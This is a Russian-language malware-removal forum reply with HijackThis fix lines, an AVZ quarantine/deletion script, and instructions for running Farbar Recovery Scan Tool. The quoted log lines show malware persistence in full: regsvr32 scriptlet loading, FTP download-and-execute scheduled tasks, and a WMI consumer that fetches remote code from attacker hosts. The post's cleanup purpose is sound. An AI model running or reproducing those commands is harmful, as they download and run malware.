Систему надо обновлять, нечисть лезет через закрытую ещё в апреле прошлого года уязвимость.
Запустите HijackThis, расположенный в папке Autologger (в Windows Vista/7/8/10 необходимо запускать через правую кнопку мыши Запуск от имени администратора))и пофиксите только эти строки :
Код:
O4 - HKCU\..\Policies\Explorer\Run: [Policies] = c:\dir\install\install\111111111.exe (file missing)
O4 - HKLM\..\Policies\Explorer\Run: [Policies] = c:\dir\install\install\111111111.exe (file missing)
O4-32 - HKLM\..\Run: [start] = C:\Windows\system32\regsvr32.exe /u /s /i:http://js.ftp0930.host:280/v.sct scrobj.dll
O7 - IPSec: Name: win (2018/12/06) - {77a5c2a1-62ee-48ca-9253-39e30c0d8bec} - Source: Any IP - Destination: my IP (Port 135 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2018/12/06) - {77a5c2a1-62ee-48ca-9253-39e30c0d8bec} - Source: Any IP - Destination: my IP (Port 137 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2018/12/06) - {77a5c2a1-62ee-48ca-9253-39e30c0d8bec} - Source: Any IP - Destination: my IP (Port 138 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2018/12/06) - {77a5c2a1-62ee-48ca-9253-39e30c0d8bec} - Source: Any IP - Destination: my IP (Port 139 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2018/12/06) - {77a5c2a1-62ee-48ca-9253-39e30c0d8bec} - Source: Any IP - Destination: my IP (Port 445 TCP) (mirrored) - Action: Block
O22 - Task: (disabled) Mysa - C:\Windows\system32\cmd.exe /c echo open ftp.ftp0930.host>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe
O22 - Task: (disabled) Mysa2 - C:\Windows\system32\cmd.exe /c echo open ftp.ftp0930.host>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p
O22 - Task: (disabled) Mysa3 - C:\Windows\system32\cmd.exe /c echo open ftp.ftp0930.host>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe
O25 - WMI Event: fuckyoumm2_consumer - fuckyoumm2_filter - var toff=3000;var url1 = "http://wmi.mykings.top:8888/kill.html";http = new ActiveXObject("Msxml2.ServerXMLHTTP");fso = new ActiveXObject("Scripting.FilesystemObject");wsh = new ActiveXObject("WScript.Shell");http.open("GET", url1, false);http.send();str = http.responseText;arr = str.split("\r\n");f(1730 bytes)
Выполните скрипт в AVZ:
Код:
begin
QuarantineFile('a.exe', '');
QuarantineFile('c:\dir\install\install\111111111.exe', '');
QuarantineFile('c:\windows\debug\item.dat', '');
QuarantineFile('C:\Windows\help\lsmosee.exe', '');
DeleteFile('a.exe', '');
DeleteFile('c:\dir\install\install\111111111.exe', '32');
DeleteFile('c:\windows\debug\item.dat', '');
DeleteFile('C:\Windows\help\lsmosee.exe', '');
ExecuteFile('schtasks.exe', '/delete /TN "{0214FF5B-BC9A-437D-A956-712F666B1CFC}" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "Mysa" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "Mysa2" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "Mysa3" /F', 0, 15000, true);
RegKeyParamDel('HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run', 'Policies');
RegKeyParamDel('HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\Run', 'start');
CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
ExecuteSysClean;
ExecuteWizard('SCU', 2, 2, true);
RebootWindows(true);
end.
Компьютер перезагрузится.
В папке с AVZ появится архив карантина quarantine.zip, отправьте этот файл по ссылке "Прислать запрошенный карантин" над над первым сообщением в теме.
Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.
Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
Прикрепите эти файлы к своему следующему сообщению (лучше оба в одном архиве).